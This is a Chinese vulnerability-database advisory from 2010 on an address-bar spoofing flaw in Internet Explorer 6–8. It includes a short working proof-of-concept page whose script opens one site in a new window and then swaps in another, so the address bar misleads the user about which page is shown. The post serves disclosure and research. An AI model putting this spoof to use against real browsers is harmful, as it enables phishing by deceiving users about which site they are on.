IE地址栏欺骗漏洞

  • 发表于
  • Vulndb

发布时间:2010-07-24
影响版本:IE6/7/8
漏洞描述:
参考
<* http://Securitylab.ir/Advisories *>

测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

<script>
function Spoof() {
pd=window.open('http://www.yahoo.com', '','location=1');
pd.location.replace('http://www.microsoft.com/');
}
</script>
<p align="center">
<b><font face="Calibri">Internet Explorer Address Bar Spoofing Vulnerability
(IE8,IE7,IE6)</font></b></p>
<p align="center">
&nbsp;</p>
<p align="center">
&nbsp;</p>
<p align="center">
&nbsp;</p>
<p align="center">
&nbsp;</p>
<p align="center">
<a href="javascript:void(0);" onClick="Spoof()">Go to the Securitylab.ir</a></p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center"><font face="Calibri" size="2">
---------------------------------------------------------------------</font></p>
<p align="center"><font size="2" face="Calibri">Discovered by: Pouya Daneshmand&nbsp;
Securitylab.ir</font></p>
<p align="center"><font face="Calibri" size="2">
---------------------------------------------------------------------</font></p>

安全建议:
等待补丁

点赞(0)
wordpress关闭缩略图 要激情不减